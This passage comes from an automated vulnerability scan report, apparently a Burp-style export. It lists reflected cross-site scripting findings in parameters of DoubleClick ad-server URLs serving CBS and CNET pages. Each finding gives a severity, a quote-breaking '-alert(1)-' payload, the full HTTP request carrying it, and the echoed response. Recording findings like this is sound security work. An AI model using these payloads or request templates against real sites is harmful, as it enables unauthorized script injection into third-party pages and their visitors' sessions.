GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.3272656"-alert(1)-"4f84709e101&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.3272656"-alert(1)-"4f84709e101&event=58/http://personalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;

...[SNIP]...

3.114. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [b parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82c48'-alert(1)-'d6f94ea770e was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=582c48'-alert(1)-'d6f94ea770e&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
3B61499020%3B4307-300/250%3B41885699/41903486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=582c48'-alert(1)-'d6f94ea770e&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mz
...[SNIP]...

3.115. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [b parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4704"-alert(1)-"c0ca4634e03 was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5a4704"-alert(1)-"c0ca4634e03&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54548

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
3B61499020%3B4307-300/250%3B41885690/41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5a4704"-alert(1)-"c0ca4634e03&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mz
...[SNIP]...

3.116. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccf37"-alert(1)-"dd1f54e8ddd was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815ccf37"-alert(1)-"dd1f54e8ddd&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54539

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815ccf37"-alert(1)-"dd1f54e8ddd&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event
...[SNIP]...

3.117. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c58a'-alert(1)-'e02ed8d2af6 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=200578159c58a'-alert(1)-'e02ed8d2af6&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54539

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=200578159c58a'-alert(1)-'e02ed8d2af6&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event
...[SNIP]...

3.118. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [count parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b88b2'-alert(1)-'0ab3a2f4648 was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=b88b2'-alert(1)-'0ab3a2f4648&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54542

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=b88b2'-alert(1)-'0ab3a2f4648&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://www.blackberry.com">
...[SNIP]...

3.119. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [count parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5db19"-alert(1)-"34a1cc021fa was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=5db19"-alert(1)-"34a1cc021fa&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=5db19"-alert(1)-"34a1cc021fa&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/";
this.clickN = "0";
this.type = type;
this.uniqueId = plcrInfo_130384842
...[SNIP]...

3.120. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [cpnmodule parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 839f6"-alert(1)-"d40e86f6f52 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=839f6"-alert(1)-"d40e86f6f52&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
66%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=839f6"-alert(1)-"d40e86f6f52&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/";
this.clickN = "0";
this.type = type;
this.uniqueId = plcrInfo_13
...[SNIP]...

3.121. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [cpnmodule parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f2cf'-alert(1)-'434cc702ff0 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=2f2cf'-alert(1)-'434cc702ff0&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54542

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
66%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=2f2cf'-alert(1)-'434cc702ff0&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://www.blackberry.com">
...[SNIP]...

3.122. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [e parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4884'-alert(1)-'1fd9fbb2e3b was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3a4884'-alert(1)-'1fd9fbb2e3b&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54539

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
